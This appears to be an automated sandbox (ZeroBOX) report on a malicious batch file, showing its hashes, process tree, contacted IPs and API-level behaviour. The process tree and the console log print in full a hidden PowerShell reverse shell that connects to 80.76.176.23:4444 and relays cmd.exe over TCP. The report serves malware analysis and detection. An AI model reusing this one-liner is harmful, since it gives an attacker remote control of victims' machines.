Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Sept. 4, 2024, 5:45 p.m.	Sept. 4, 2024, 5:47 p.m.

Size	1.5KB
Type	ASCII text, with very long lines, with no line terminators
MD5	`978e36e12abdfb849745a694eca47fc6`
SHA256	`94348b8aba05449059863153d86e7f4cea880aacb65238bb3666dabeaa9aaffe`
CRC32	`E9961EB3`
ssdeep	`48:kv37GW2WLnSB7IxcSe5LXFQz+39XvwS0CfakvZpOWi:JEUIxcSOyKYS9C`
Yara	None matched

cmd.exe "C:\Windows\System32\cmd.exe" /c start /wait "TyZtIWu" C:\Users\test22\AppData\Local\Temp\shell.bat
3016
- cmd.exe C:\Windows\system32\cmd.exe /K C:\Users\test22\AppData\Local\Temp\shell.bat
  904
  - powershell.exe powershell -w hidden -nop -c $a='80.76.176.23';$b=4444;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream();while ($true) { start-sleep -m 100; if ($osread.IsCompleted -and $osread.Result -ne 0) { $r=$os.BaseStream.EndRead($osread); $s.Write($ob,0,$r); $s.Flush(); $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null); } if ($esread.IsCompleted -and $esread.Result -ne 0) { $r=$es.BaseStream.EndRead($esread); $s.Write($eb,0,$r); $s.Flush(); $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null); } if ($s.DataAvailable) { $r=$s.Read($nb,0,$nb.Length); if ($r -lt 1) { break; } else { $str=$e.GetString($nb,0,$r); $is.write($str); } } if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) { break; } if ($p.ExitCode -ne $null) { break; }}
    2292
    - cmd.exe "cmd.exe"
      2356

Name	Response	Post-Analysis Lookup
No hosts contacted.

IP Address	Status	Action
164.124.101.2	Active	Moloch
80.76.176.23	Active	Moloch

Suricata Alerts

No Suricata Alerts

Suricata TLS

No Suricata TLS

Queries for the computername (7 events)

Time & API	Arguments	Status	Return
GetComputerNameW Sept. 4, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 4, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 4, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 4, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Sept. 4, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 4, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Sept. 4, 2024, 5:45 p.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (1 event)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Sept. 4, 2024, 5:45 p.m.			0	0

Command line console output was observed (50 out of 101 events)

Time & API	Arguments	Status	Return
WriteConsoleW Sept. 4, 2024, 5:45 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2024, 5:45 p.m.	buffer: powershell console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2024, 5:45 p.m.	buffer: -w hidden -nop -c $a='80.76.176.23';$b=4444;$c=New-Object system.net.sockets.tcpclient;$nb=New-Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$eb=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.RedirectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.StandardInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream();while ($true) { start-sleep -m 100; if ($osread.IsCompleted -and $osread.Result -ne 0) { $r=$os.BaseStream.EndRead($osread); $s.Write($ob,0,$r); $s.Flush(); $osread=$os.BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null); } if ($esread.IsCompleted -and $esread.Result -ne 0) { $r=$es.BaseStream.EndRead($esread); $s.Write($eb,0,$r); $s.Flush(); $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null, $null); } if ($s.DataAvailable) { $r=$s.Read($nb,0,$nb.Length); if ($r -lt 1) { break; } else { $str=$e.GetString($nb,0,$r); $is.write($str); } } if ($c.Connected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectRead) -and $c.Client.Available -eq 0)) { break; } if ($p.ExitCode -ne $null) { break; }} console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: C:\Users\test22\AppData\Local\Temp> console_handle: 0x00000007	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: Exception calling "Connect" with "2" argument(s): "A connection attempt failed console_handle: 0x00000023	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: because the connected party did not properly respond after a period of time, or console_handle: 0x0000002f	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: established connection failed because connected host has failed to respond 80. console_handle: 0x0000003b	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: At line:1 char:667 console_handle: 0x00000053	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: + $a='80.76.176.23';$b=4444;$c=New-Object system.net.sockets.tcpclient;$nb=New- console_handle: 0x0000005f	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$e console_handle: 0x0000006b	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: b=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New- console_handle: 0x00000077	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo. console_handle: 0x00000083	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.Redi console_handle: 0x0000008f	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: rectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.Standar console_handle: 0x0000009b	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: dInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginR console_handle: 0x000000a7	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: ead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, console_handle: 0x000000b3	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: $eb.Length, $null, $null);$c.connect <<<< ($a,$b);$s=$c.GetStream();while ($tru console_handle: 0x000000bf	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: e) { start-sleep -m 100; if ($osread.IsCompleted -and $osread.Result -ne 0) { $ console_handle: 0x000000cb	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: r=$os.BaseStream.EndRead($osread); $s.Write($ob,0,$r); $s.Flush(); $osread=$os. console_handle: 0x000000d7	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null); } if ($esread.IsComplet console_handle: 0x000000e3	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: ed -and $esread.Result -ne 0) { $r=$es.BaseStream.EndRead($esread); $s.Write($e console_handle: 0x000000ef	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: b,0,$r); $s.Flush(); $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null console_handle: 0x000000fb	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: , $null); } if ($s.DataAvailable) { $r=$s.Read($nb,0,$nb.Length); if ($r -lt 1) console_handle: 0x00000107	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: { break; } else { $str=$e.GetString($nb,0,$r); $is.write($str); } } if ($c.Con console_handle: 0x00000113	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: nected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectR console_handle: 0x0000011f	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: ead) -and $c.Client.Available -eq 0)) { break; } if ($p.ExitCode -ne $null) { b console_handle: 0x0000012b	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: reak; }} console_handle: 0x00000137	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException console_handle: 0x00000143	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: + FullyQualifiedErrorId : DotNetMethodException console_handle: 0x0000014f	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: Exception calling "GetStream" with "0" argument(s): "The operation is not allow console_handle: 0x0000016f	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: ed on non-connected sockets." console_handle: 0x0000017b	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: At line:1 char:690 console_handle: 0x00000187	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: + $a='80.76.176.23';$b=4444;$c=New-Object system.net.sockets.tcpclient;$nb=New- console_handle: 0x00000193	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: Object System.Byte[] $c.ReceiveBufferSize;$ob=New-Object System.Byte[] 65536;$e console_handle: 0x0000019f	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: b=New-Object System.Byte[] 65536;$e=new-object System.Text.UTF8Encoding;$p=New- console_handle: 0x000001ab	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe';$p.StartInfo. console_handle: 0x000001b7	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1;$p.StartInfo.Redi console_handle: 0x000001c3	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: rectStandardError=1;$p.StartInfo.UseShellExecute=0;$q=$p.Start();$is=$p.Standar console_handle: 0x000001cf	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: dInput;$os=$p.StandardOutput;$es=$p.StandardError;$osread=$os.BaseStream.BeginR console_handle: 0x000001db	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: ead($ob, 0, $ob.Length, $null, $null);$esread=$es.BaseStream.BeginRead($eb, 0, console_handle: 0x000001e7	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: $eb.Length, $null, $null);$c.connect($a,$b);$s=$c.GetStream <<<< ();while ($tru console_handle: 0x000001f3	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: e) { start-sleep -m 100; if ($osread.IsCompleted -and $osread.Result -ne 0) { $ console_handle: 0x000001ff	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: r=$os.BaseStream.EndRead($osread); $s.Write($ob,0,$r); $s.Flush(); $osread=$os. console_handle: 0x0000020b	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: BaseStream.BeginRead($ob, 0, $ob.Length, $null, $null); } if ($esread.IsComplet console_handle: 0x00000217	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: ed -and $esread.Result -ne 0) { $r=$es.BaseStream.EndRead($esread); $s.Write($e console_handle: 0x00000223	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: b,0,$r); $s.Flush(); $esread=$es.BaseStream.BeginRead($eb, 0, $eb.Length, $null console_handle: 0x0000022f	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: , $null); } if ($s.DataAvailable) { $r=$s.Read($nb,0,$nb.Length); if ($r -lt 1) console_handle: 0x0000023b	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: { break; } else { $str=$e.GetString($nb,0,$r); $is.write($str); } } if ($c.Con console_handle: 0x00000247	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: nected -ne $true -or ($c.Client.Poll(1,[System.Net.Sockets.SelectMode]::SelectR console_handle: 0x00000253	1	1
WriteConsoleW Sept. 4, 2024, 5:46 p.m.	buffer: ead) -and $c.Client.Available -eq 0)) { break; } if ($p.ExitCode -ne $null) { b console_handle: 0x0000025f	1	1

Uses Windows APIs to generate a cryptographic key (46 events)

Time & API	Arguments	Status	Return
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fd18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fa58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fa58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fa58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f658 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f158 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fc58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fc58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fc58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f818 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fc58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fc58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fc58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fc58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fc58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fc58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fc58 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036fb18 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f298 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:45 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f298 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1
CryptExportKey Sept. 4, 2024, 5:46 p.m.	buffer: <INVALID POINTER> crypto_handle: 0x0036f218 flags: 0 crypto_export_handle: 0x00000000 blob_type: 6	1	1

Checks amount of memory in system, this can be used to detect virtual machines that have a low amount of memory available (1 event)

Time & API	Arguments	Status	Return	Repeated
GlobalMemoryStatusEx Sept. 4, 2024, 5:45 p.m.		1	1	0

Allocates read-write-execute memory (usually to unpack itself) (50 out of 158 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 1048576 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02990000 allocation_type: 8192 (MEM_RESERVE) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73961000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021ba000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 8192 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73962000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021b2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c2000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a51000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 8192 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02a52000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0222a000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c3000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c4000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0223b000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02237000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021bb000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02222000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02235000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c5000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0222c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02870000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x021c6000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x0223c000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtAllocateVirtualMemory Sept. 4, 2024, 5:45 p.m.	process_identifier: 2292 region_size: 4096 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 1 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x02223000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
